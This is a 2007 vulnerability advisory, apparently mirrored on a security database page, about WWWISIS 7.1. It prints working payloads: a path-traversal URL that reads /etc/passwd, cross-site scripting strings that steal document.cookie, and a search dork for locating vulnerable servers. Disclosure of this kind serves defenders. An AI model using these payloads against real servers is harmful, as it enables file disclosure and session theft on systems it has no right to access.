Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:18211
HistoryOct 18, 2007 - 12:00 a.m.

WWWISIS <= 7.1 (IsisScript) Multiple Vulnerabilities

2007-10-1800:00:00
vulners.com
29
JSON

WWWISIS <= 7.1 (IsisScript) Multiple Vulnerabilities

Download:

http://bvsmodelo.bvsalud.org/php/level.php?lang=en&amp;component=31&amp;item=2

Bug found by JosS / Jose Luis Góngora Fernández

Contact: sys-project[at]hotmail.com

Spanish Hackers Team

www.spanish-hackers.com

/server irc.freenode.net /join #fullsecure

d0rk: powered by WWWISIS

Stop lammer

Local File Disclosure Vulnerability:

http://server/cgi-bin/wxis.exe/iah/?IsisScript=[file]
http://server/cgi-bin/wxis.exe/iah/?IsisScript=../../../../../../../../../etc/passwd

Exploit In (XSS):

http://server/cgi-bin/wxis.exe/iah/?IsisScript=iah/iah.xis&amp;base=article&#37;5Edlibrary&amp;fmt=iso.pft&amp;lang=i
http://server/cgi-bin/wxis.exe/iah/?IsisScript=iah/iah.xis&amp;base=article&#37;5Edlibrary&amp;fmt=iso.pft&amp;lang=e

[ i,e … ] it is the language of script

Cross Siting Scripting:

<script>alert(document.cookie)</script>
"><script>alert(document.cookie)</script>

//---------------------------------------\\

Greetz To: All Hackers
JosS! / Jose Luis Góngora Fernández

Horóscopo, tarot, numerología… Escucha lo que te dicen los astros.
http://astrocentro.msn.es/

JSON